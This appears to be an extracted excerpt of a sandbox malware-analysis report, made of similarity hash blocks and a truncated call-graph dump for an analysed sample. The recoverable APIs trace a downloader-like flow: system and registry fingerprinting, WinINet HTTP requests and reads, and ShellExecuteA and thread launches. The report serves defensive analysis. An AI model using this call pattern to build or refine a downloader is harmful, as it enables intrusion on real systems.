Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5560000_file.jbxd
Uniqueness Score: -1.00%


                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 695b2c5e1b42a1038bd00bc3ccaf5f7a8359cbb1bdab023b0fb2f57acfea4600
                                                                                                                                                                                                                                          • Instruction ID: f7fe4910d7e8dafe2ce9b63d1749294464714aa6f78dad7637801ebefffb6462
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 695b2c5e1b42a1038bd00bc3ccaf5f7a8359cbb1bdab023b0fb2f57acfea4600
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2001D1BF54C260BE6042C6816758AB67B7EF5C2A703308D37F403D31A2E2A49E0951B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 589782ea50164dc96e0ca5647844aca4f4633a95561abab5a77b690d80494001
                                                                                                                                                                                                                                          • Instruction ID: 4477d62dd6389ff9e35013a85141625d0d7c623d334abe0220bb28a002b98e98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 589782ea50164dc96e0ca5647844aca4f4633a95561abab5a77b690d80494001
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF0AFFB548260BE6142C6816B5C9F67B7AF5C3A703308D76F443D3192E2A45A0961B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 81793f8b953b829b7488ea430462e4162f093803676244158cca62ae31ad976d
                                                                                                                                                                                                                                          • Instruction ID: 69c3b28bbfa75ac250c4f5d0b2cebabe4e47bbcc2f402f8cc1d2d0d09a657c0d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81793f8b953b829b7488ea430462e4162f093803676244158cca62ae31ad976d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BF090EF54C2A0BE6042C281675CAF66B7EF5C35703308976F403D3152E2954F4E61B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1fa8d2c83e195b819cc515ca8ca5515a0e8d986a06222b1c556d2fa8c6863e45
                                                                                                                                                                                                                                          • Instruction ID: a12449bde395600d8c2b948998e230a0cdbe67f7ebbf9438d73cf31b1bac2f85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fa8d2c83e195b819cc515ca8ca5515a0e8d986a06222b1c556d2fa8c6863e45
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F01CAF14C1B17E6046D5926B2C9B76B7EF5C3A703308D2BF043C2096E6985A4E60B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d1160ca4039b8f959debfad395607194514b5b9e16afe14027abae66fbab320c
                                                                                                                                                                                                                                          • Instruction ID: 071170af92d8e85fe5b45f931cd70dc0d8b0b4b700135329be0afc9d7b75495f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1160ca4039b8f959debfad395607194514b5b9e16afe14027abae66fbab320c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4F01CAF54C160BE6041C2826B289B66B7EF5C3A70370893BF403D2192E6954A4D61B2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8b8a672389aeac187f3ac7bafc95d11529aee90415cc11bab77057fa8a0cecbb
                                                                                                                                                                                                                                          • Instruction ID: 74c55c1566fc1b0c5df70cb8db24ab86de6cb444896a5b98ad696727c6e6eca1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b8a672389aeac187f3ac7bafc95d11529aee90415cc11bab77057fa8a0cecbb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E065AF14C1607E6041C1516B18DB76B7DF4C3A70331CC3BF443C2042E6948A0E6072
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2029847165.0000000005560000.00000040.00001000.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5560000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c75c7e5d264628b60cb37c865405b3ccca3f45a4e9ce5705c287b660cb7a27ff
                                                                                                                                                                                                                                          • Instruction ID: 7935b99bc8a43dc5933876e700c6f35efe10ce03c52de8007345f47ae4ea9414
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c75c7e5d264628b60cb37c865405b3ccca3f45a4e9ce5705c287b660cb7a27ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FE04FEF24C1647D7041E0827B58EFB6B6EE1C2A313B18837F442D2482E7D98E4E6172
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:9.2%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:9.2%
                                                                                                                                                                                                                                          Total number of Nodes:1645
                                                                                                                                                                                                                                          Total number of Limit Nodes:56
Execution Graph

This section of the report is the rendered call graph of the sample's code. The drawing itself did not survive extraction: what remains is its node list (a decimal node id, the call-site address, and the Windows API or C runtime routine the sandbox attributes to that code) and its edge list, and the dump is cut off at the end of the page, so the graph is incomplete. Labels such as "13 API calls" or "5 API calls" stand for subtrees that are not expanded. Most nodes are C runtime and STL plumbing (RtlAllocateHeap wrappers, __dosmaperr, ___std_exception_copy, shared_ptr, Concurrency::details::_Reschedule_chore, __Mtx_unlock, __Cnd_broadcast). The Windows API calls recoverable from the surviving node labels, with their call-site addresses in the analysed image, are:

File and handle APIs: CreateFileW (5c65b6), GetFileType (5c66b1), GetFileInformationByHandle (5c6725), FindCloseChangeNotification (5c6619), SystemTimeToTzSpecificLocalTime (5c6821, 5c6859)
Process launch and timing: ShellExecuteA (596e9a), CreateThread followed by Sleep (59722c), Sleep (59710c, 5a646c), GetSystemTimePreciseAsFileTime (5abe8c)
WinINet networking: InternetOpenW and InternetConnectA (59b6d6), HttpOpenRequestA (59b758); the graph is truncated immediately after the request is opened
Synchronisation and thread pool: SleepConditionVariableCS (5ac98c), RtlWakeAllConditionVariable (5ac960), TpCallbackUnloadDllOnCompletion (5ac39c)
PEB reads: GetPEB (5c9a72, 5c5d1a, 5cb255)
Heap: RtlAllocateHeap (5c308c, 5ccfd7, 5ca7e4, 5c8354, and through the allocation wrappers at 5a71e0, 5a78a0, 595d40, 5a7b00, 5a7a00, which the graph reaches from almost every other node)

The RtlAllocateHeap-only chains carry no behavioural information; the nodes worth following are the ShellExecuteA, CreateThread/Sleep and WinINet call sites and the code paths that lead to them.
595d40 RtlAllocateHeap 14239->14241 14240->14238 14242 59b7f4 14241->14242 14243 5a71e0 RtlAllocateHeap 14242->14243 14244 59b80d 14243->14244 14245 595d40 RtlAllocateHeap 14244->14245 14246 59b818 HttpSendRequestA 14245->14246 14249 59b83b shared_ptr 14246->14249 14248 59b8c3 InternetReadFile 14250 59b8ea 14248->14250 14249->14248 14255 598170 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14251->14255 14256 5980a5 shared_ptr 14251->14256 14252 598237 14254 5a79e0 RtlAllocateHeap 14252->14254 14253 5a78a0 RtlAllocateHeap 14253->14256 14254->14255 14255->13997 14256->14252 14256->14253 14256->14255 14258 5a71e0 RtlAllocateHeap 14257->14258 14259 5993ee 14258->14259 14260 595d40 RtlAllocateHeap 14259->14260 14261 5993f7 shared_ptr __cftof __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14260->14261 14261->14080 14263 5a71e0 RtlAllocateHeap 14262->14263 14264 5a3b52 14263->14264 14265 5a71e0 RtlAllocateHeap 14264->14265 14266 5a3b64 14265->14266 14267 598050 RtlAllocateHeap 14266->14267 14268 5a3b6d 14267->14268 14269 5a3dc6 14268->14269 14277 5a3b78 shared_ptr 14268->14277 14270 5a71e0 RtlAllocateHeap 14269->14270 14271 5a3dd7 14270->14271 14272 5a71e0 RtlAllocateHeap 14271->14272 14273 5a3dec 14272->14273 14274 5a71e0 RtlAllocateHeap 14273->14274 14276 5a3d90 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14274->14276 14275 5a8a60 RtlAllocateHeap 14275->14277 14276->14079 14277->14275 14277->14276 14278 5a71e0 RtlAllocateHeap 14277->14278 14279 5a78a0 RtlAllocateHeap 14277->14279 14278->14277 14279->14277 14281 5961bf 14280->14281 14282 5a71e0 RtlAllocateHeap 14281->14282 14283 596226 14282->14283 14284 595d40 RtlAllocateHeap 
14283->14284 14285 596231 14284->14285 14441 5921c0 14285->14441 14287 596249 shared_ptr 14288 5a71e0 RtlAllocateHeap 14287->14288 14300 596463 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14287->14300 14289 5962b2 14288->14289 14290 595d40 RtlAllocateHeap 14289->14290 14291 5962bd 14290->14291 14292 5921c0 5 API calls 14291->14292 14301 5962d7 shared_ptr 14292->14301 14293 5963d2 14294 5a78a0 RtlAllocateHeap 14293->14294 14296 59641c 14294->14296 14295 5a71e0 RtlAllocateHeap 14295->14301 14297 5a78a0 RtlAllocateHeap 14296->14297 14297->14300 14298 595d40 RtlAllocateHeap 14298->14301 14299 5921c0 5 API calls 14299->14301 14300->13973 14301->14293 14301->14295 14301->14298 14301->14299 14301->14300 14303 596821 14302->14303 14311 596548 shared_ptr 14302->14311 14304 5968e3 14303->14304 14305 596844 14303->14305 14307 5a79e0 RtlAllocateHeap 14304->14307 14306 5a78a0 RtlAllocateHeap 14305->14306 14308 596863 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14306->14308 14307->14308 14308->13983 14309 5a78a0 RtlAllocateHeap 14309->14311 14310 5a8a60 RtlAllocateHeap 14310->14311 14311->14303 14311->14304 14311->14308 14311->14309 14311->14310 14313 597916 __cftof 14312->14313 14314 5a71e0 RtlAllocateHeap 14313->14314 14353 597a68 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14313->14353 14315 597947 14314->14315 14316 595d40 RtlAllocateHeap 14315->14316 14317 597952 14316->14317 14318 5a71e0 RtlAllocateHeap 14317->14318 14319 597974 14318->14319 14320 595d40 RtlAllocateHeap 14319->14320 14322 59797f shared_ptr 14320->14322 14321 597a53 GetNativeSystemInfo 14323 597a57 14321->14323 14322->14321 14322->14323 14322->14353 14324 
597abf 14323->14324 14325 597b94 14323->14325 14323->14353 14327 5a71e0 RtlAllocateHeap 14324->14327 14326 5a71e0 RtlAllocateHeap 14325->14326 14328 597bc0 14326->14328 14329 597ae0 14327->14329 14330 595d40 RtlAllocateHeap 14328->14330 14331 595d40 RtlAllocateHeap 14329->14331 14332 597bc7 14330->14332 14333 597ae7 14331->14333 14334 5a71e0 RtlAllocateHeap 14332->14334 14335 5a71e0 RtlAllocateHeap 14333->14335 14337 597bdf 14334->14337 14336 597aff 14335->14336 14338 595d40 RtlAllocateHeap 14336->14338 14339 595d40 RtlAllocateHeap 14337->14339 14340 597b06 14338->14340 14341 597be6 14339->14341 14342 595e90 4 API calls 14340->14342 14343 595e90 4 API calls 14341->14343 14344 597b1b 14342->14344 14345 597bf7 14343->14345 14563 5c8331 14344->14563 14346 5a71e0 RtlAllocateHeap 14345->14346 14348 597c12 14346->14348 14349 595d40 RtlAllocateHeap 14348->14349 14350 597c19 14349->14350 14351 595860 RtlAllocateHeap 14350->14351 14352 597c28 14351->14352 14354 5a71e0 RtlAllocateHeap 14352->14354 14353->13985 14355 597c63 14354->14355 14356 595d40 RtlAllocateHeap 14355->14356 14357 597c6a 14356->14357 14358 5a71e0 RtlAllocateHeap 14357->14358 14359 597c82 14358->14359 14360 595d40 RtlAllocateHeap 14359->14360 14361 597c89 14360->14361 14362 595e90 4 API calls 14361->14362 14363 597c9a 14362->14363 14364 5a71e0 RtlAllocateHeap 14363->14364 14365 597cb5 14364->14365 14366 595d40 RtlAllocateHeap 14365->14366 14367 597cbc 14366->14367 14368 595860 RtlAllocateHeap 14367->14368 14369 597ccb 14368->14369 14370 5a71e0 RtlAllocateHeap 14369->14370 14371 597d06 14370->14371 14372 595d40 RtlAllocateHeap 14371->14372 14373 597d0d 14372->14373 14374 5a71e0 RtlAllocateHeap 14373->14374 14375 597d25 14374->14375 14376 595d40 RtlAllocateHeap 14375->14376 14377 597d2c 14376->14377 14378 595e90 4 API calls 14377->14378 14379 597d3d 14378->14379 14380 5a71e0 RtlAllocateHeap 14379->14380 14381 597d58 14380->14381 14382 595d40 RtlAllocateHeap 14381->14382 14383 597d5f 14382->14383 14384 595860 
RtlAllocateHeap 14383->14384 14384->14353 14386 5944d4 14385->14386 14386->14386 14387 5a78a0 RtlAllocateHeap 14386->14387 14388 594547 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14386->14388 14387->14388 14388->13989 14390 597eb5 __cftof 14389->14390 14391 5a71e0 RtlAllocateHeap 14390->14391 14399 597ed3 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14390->14399 14392 597eec 14391->14392 14393 595d40 RtlAllocateHeap 14392->14393 14394 597ef7 14393->14394 14395 5a71e0 RtlAllocateHeap 14394->14395 14396 597f19 14395->14396 14397 595d40 RtlAllocateHeap 14396->14397 14400 597f24 shared_ptr 14397->14400 14398 597ff4 GetNativeSystemInfo 14398->14399 14399->13992 14400->14398 14400->14399 14566 5c38d0 14401->14566 14404 595f41 RegCloseKey 14406 595f67 14404->14406 14405 595f17 RegQueryValueExA 14405->14404 14406->14406 14407 5a78a0 RtlAllocateHeap 14406->14407 14408 595f7f shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14407->14408 14408->14042 14412 5a75e1 14409->14412 14413 5a760c 14409->14413 14410 5a7700 14411 5a8a50 RtlAllocateHeap 14410->14411 14416 5a7671 shared_ptr 14411->14416 14412->14059 14413->14410 14414 5a76fb 14413->14414 14417 5a7660 14413->14417 14418 5a7687 14413->14418 14415 592380 RtlAllocateHeap 14414->14415 14415->14410 14416->14059 14417->14414 14419 5a766b 14417->14419 14418->14416 14420 5acbc7 RtlAllocateHeap 14418->14420 14421 5acbc7 RtlAllocateHeap 14419->14421 14420->14416 14421->14416 14423 5a85a9 14422->14423 14424 5a84a3 14422->14424 14425 5a8a50 RtlAllocateHeap 14423->14425 14427 5a850f 14424->14427 14428 5a84e5 14424->14428 14426 5a85ae 14425->14426 14429 592380 RtlAllocateHeap 14426->14429 14431 5a84f6 shared_ptr 
14427->14431 14433 5acbc7 RtlAllocateHeap 14427->14433 14428->14426 14430 5a84f0 14428->14430 14429->14431 14432 5acbc7 RtlAllocateHeap 14430->14432 14431->14066 14432->14431 14433->14431 14435 5a78a0 RtlAllocateHeap 14434->14435 14436 594993 14435->14436 14437 5a78a0 RtlAllocateHeap 14436->14437 14438 5949ac 14437->14438 14568 594590 14438->14568 14440 594a39 shared_ptr 14440->14216 14444 592180 14441->14444 14445 592196 14444->14445 14448 5c7f17 14445->14448 14451 5c6d06 14448->14451 14450 5921a4 14450->14287 14452 5c6d46 14451->14452 14456 5c6d2e __dosmaperr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ ___std_exception_copy 14451->14456 14453 5c60ea __cftof 5 API calls 14452->14453 14452->14456 14454 5c6d5e 14453->14454 14457 5c72c1 14454->14457 14456->14450 14459 5c72d2 14457->14459 14458 5c72e1 __dosmaperr ___std_exception_copy 14458->14456 14459->14458 14464 5c7865 14459->14464 14469 5c74bf 14459->14469 14474 5c74e5 14459->14474 14495 5c7633 14459->14495 14465 5c786e 14464->14465 14466 5c7875 14464->14466 14514 5c724d 14465->14514 14466->14459 14468 5c7874 14468->14459 14470 5c74cf 14469->14470 14471 5c74c8 14469->14471 14470->14459 14472 5c724d 5 API calls 14471->14472 14473 5c74ce 14472->14473 14473->14459 14475 5c74ec 14474->14475 14489 5c7506 __dosmaperr ___std_exception_copy 14474->14489 14476 5c764c 14475->14476 14477 5c76b8 14475->14477 14475->14489 14480 5c768f 14476->14480 14484 5c7658 14476->14484 14478 5c76fe 14477->14478 14479 5c76bf 14477->14479 14477->14480 14536 5c7d01 14478->14536 14482 5c76c4 14479->14482 14483 5c7666 14479->14483 14492 5c7674 14480->14492 14494 5c7688 14480->14494 14526 5c7b1d 14480->14526 14482->14480 14488 5c76c9 14482->14488 14483->14492 14483->14494 14530 5c793e 14483->14530 14484->14483 14487 5c769f 14484->14487 14484->14492 14487->14494 14518 5c7a8d 14487->14518 14488->14492 14488->14494 14522 5c7ce2 14488->14522 
14489->14459 14492->14494 14539 5c7de7 14492->14539 14494->14459 14496 5c764c 14495->14496 14497 5c76b8 14495->14497 14498 5c768f 14496->14498 14499 5c7658 14496->14499 14497->14498 14500 5c76fe 14497->14500 14501 5c76bf 14497->14501 14506 5c7b1d RtlAllocateHeap 14498->14506 14511 5c7674 14498->14511 14513 5c7688 14498->14513 14503 5c7666 14499->14503 14505 5c769f 14499->14505 14499->14511 14504 5c7d01 RtlAllocateHeap 14500->14504 14502 5c76c4 14501->14502 14501->14503 14502->14498 14508 5c76c9 14502->14508 14507 5c793e 5 API calls 14503->14507 14503->14511 14503->14513 14504->14511 14509 5c7a8d 5 API calls 14505->14509 14505->14513 14506->14511 14507->14511 14510 5c7ce2 RtlAllocateHeap 14508->14510 14508->14511 14508->14513 14509->14511 14510->14511 14512 5c7de7 5 API calls 14511->14512 14511->14513 14512->14513 14513->14459 14515 5c725f __dosmaperr 14514->14515 14516 5c8229 5 API calls 14515->14516 14517 5c7282 __dosmaperr 14516->14517 14517->14468 14520 5c7aa8 14518->14520 14519 5c7ada 14519->14492 14520->14519 14543 5cbf0f 14520->14543 14523 5c7cee 14522->14523 14524 5c7b1d RtlAllocateHeap 14523->14524 14525 5c7d00 14524->14525 14525->14492 14528 5c7b30 14526->14528 14527 5c7b4b __dosmaperr ___std_exception_copy 14527->14492 14528->14527 14546 5c6e9c 14528->14546 14531 5c7957 14530->14531 14532 5c6e9c RtlAllocateHeap 14531->14532 14533 5c7994 14532->14533 14550 5cca49 14533->14550 14535 5c7a0a 14535->14492 14535->14535 14537 5c7b1d RtlAllocateHeap 14536->14537 14538 5c7d18 14537->14538 14538->14492 14540 5c7e04 14539->14540 14541 5c7e5a __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14539->14541 14540->14541 14542 5cbf0f __cftof 5 API calls 14540->14542 14541->14494 14542->14540 14544 5cbdb4 __cftof 5 API calls 14543->14544 14545 5cbf27 14544->14545 14545->14519 14547 5c6ec0 14546->14547 14548 5c6eb1 __dosmaperr ___free_lconv_mon 14546->14548 14547->14548 
14549 5ca7bb __cftof RtlAllocateHeap 14547->14549 14548->14527 14549->14548 14552 5cca59 __dosmaperr ___std_exception_copy 14550->14552 14554 5cca6f 14550->14554 14551 5ccb06 14556 5ccb2f 14551->14556 14557 5ccb65 14551->14557 14552->14535 14553 5ccb0b 14555 5cc260 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14553->14555 14554->14551 14554->14552 14554->14553 14555->14552 14559 5ccb4d 14556->14559 14560 5ccb34 14556->14560 14558 5cc579 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14557->14558 14558->14552 14562 5cc763 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14559->14562 14561 5cc8bf GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 14560->14561 14561->14552 14562->14552 14564 5c7f87 5 API calls 14563->14564 14565 5c834f 14564->14565 14565->14353 14567 595ee4 RegOpenKeyExA 14566->14567 14567->14404 14567->14405 14569 5a78a0 RtlAllocateHeap 14568->14569 14576 594622 shared_ptr 14569->14576 14570 594788 shared_ptr 14571 594918 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14570->14571 14572 5a78a0 RtlAllocateHeap 14570->14572 14574 5a8a60 RtlAllocateHeap 14570->14574 14577 594938 14570->14577 14571->14440 14572->14570 14573 5a78a0 RtlAllocateHeap 14573->14576 14574->14570 14575 5a8a60 RtlAllocateHeap 14575->14576 14576->14570 14576->14573 14576->14575 14576->14577 14578 5a78a0 RtlAllocateHeap 14577->14578 14579 594993 14578->14579 14580 5a78a0 RtlAllocateHeap 14579->14580 14581 5949ac 14580->14581 14582 594590 RtlAllocateHeap 14581->14582 14583 594a39 shared_ptr 14582->14583 14583->14440 14600 5a7fb0 14601 5acbc7 RtlAllocateHeap 14600->14601 14602 5a800a __cftof 14601->14602 14610 5a9390 14602->14610 14608 5a804c __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14609 5a80bf 14611 5a93c5 
14610->14611 14625 592be0 14611->14625 14613 5a93f6 14634 5a9750 14613->14634 14615 5a8034 14615->14608 14616 5942f0 14615->14616 14617 5ab6bf InitOnceExecuteOnce 14616->14617 14618 59430a 14617->14618 14619 594311 14618->14619 14620 5c649b 12 API calls 14618->14620 14622 5ab630 14619->14622 14621 594324 14620->14621 14821 5ab56b 14622->14821 14624 5ab646 std::_Throw_future_error 14624->14609 14626 592c1d 14625->14626 14627 5ab6bf InitOnceExecuteOnce 14626->14627 14629 592c46 14627->14629 14628 592c51 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14628->14613 14629->14628 14631 592c88 14629->14631 14648 5ab6d7 14629->14648 14657 592340 14631->14657 14693 593740 14634->14693 14636 5a97cf 14637 5a97fc shared_ptr 14636->14637 14640 5a9838 14636->14640 14701 5a99f0 14637->14701 14639 5a981b 14639->14615 14641 5a9991 14640->14641 14643 5a998c 14640->14643 14645 5a98be 14640->14645 14642 5a8a50 RtlAllocateHeap 14641->14642 14647 5a98c4 shared_ptr 14642->14647 14644 592380 RtlAllocateHeap 14643->14644 14644->14641 14646 5acbc7 RtlAllocateHeap 14645->14646 14646->14647 14647->14615 14649 5ab6e3 14648->14649 14660 592800 14649->14660 14651 5ab703 std::_Throw_future_error 14652 5ab74a 14651->14652 14653 5ab753 14651->14653 14668 5ab65f 14652->14668 14654 5929e0 13 API calls 14653->14654 14656 5ab74f 14654->14656 14656->14631 14688 5aadb6 14657->14688 14659 592372 14661 5a78a0 RtlAllocateHeap 14660->14661 14662 59284f 14661->14662 14663 5925b0 RtlAllocateHeap 14662->14663 14665 592867 14663->14665 14664 59288d shared_ptr 14664->14651 14665->14664 14666 5c308c ___std_exception_copy RtlAllocateHeap 14665->14666 14667 5928e4 14666->14667 14667->14651 14669 5ac411 InitOnceExecuteOnce 14668->14669 14670 5ab677 14669->14670 14671 5ab67e 14670->14671 14674 5c649b 14670->14674 14671->14656 14673 5ab687 14673->14656 14681 5c64a7 __cftof 14674->14681 14675 5c835f __cftof 4 API 
calls 14676 5c64d6 14675->14676 14677 5c64e5 14676->14677 14678 5c64f3 14676->14678 14679 5c6549 12 API calls 14677->14679 14680 5c616d 5 API calls 14678->14680 14682 5c64ef 14679->14682 14683 5c650d 14680->14683 14681->14675 14682->14673 14684 5c60cd RtlAllocateHeap 14683->14684 14685 5c651a 14684->14685 14686 5c6549 12 API calls 14685->14686 14687 5c6521 ___free_lconv_mon 14685->14687 14686->14687 14687->14673 14690 5aadd1 std::_Throw_future_error 14688->14690 14689 5aae38 __cftof __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14689->14659 14690->14689 14691 5c835f __cftof 4 API calls 14690->14691 14692 5aae7f 14691->14692 14694 5937f6 14693->14694 14696 59375f 14693->14696 14694->14636 14695 59381b 14697 5a89c0 RtlAllocateHeap 14695->14697 14696->14694 14696->14695 14698 5937cd shared_ptr 14696->14698 14699 593825 14697->14699 14714 5a7530 14698->14714 14699->14636 14702 5a9a70 14701->14702 14726 5a6950 14702->14726 14704 5a9b10 14706 593740 RtlAllocateHeap 14704->14706 14705 5a9aac 14705->14704 14707 5a7530 RtlAllocateHeap 14705->14707 14708 5a9b7e shared_ptr 14706->14708 14707->14704 14709 5acbc7 RtlAllocateHeap 14708->14709 14711 5a9c9e shared_ptr 14708->14711 14710 5a9c3e 14709->14710 14734 593de0 14710->14734 14711->14639 14713 5a9c86 14713->14639 14715 5a75ab 14714->14715 14716 5a7542 14714->14716 14719 592380 RtlAllocateHeap 14715->14719 14717 5a757c 14716->14717 14718 5a754d 14716->14718 14721 5a7599 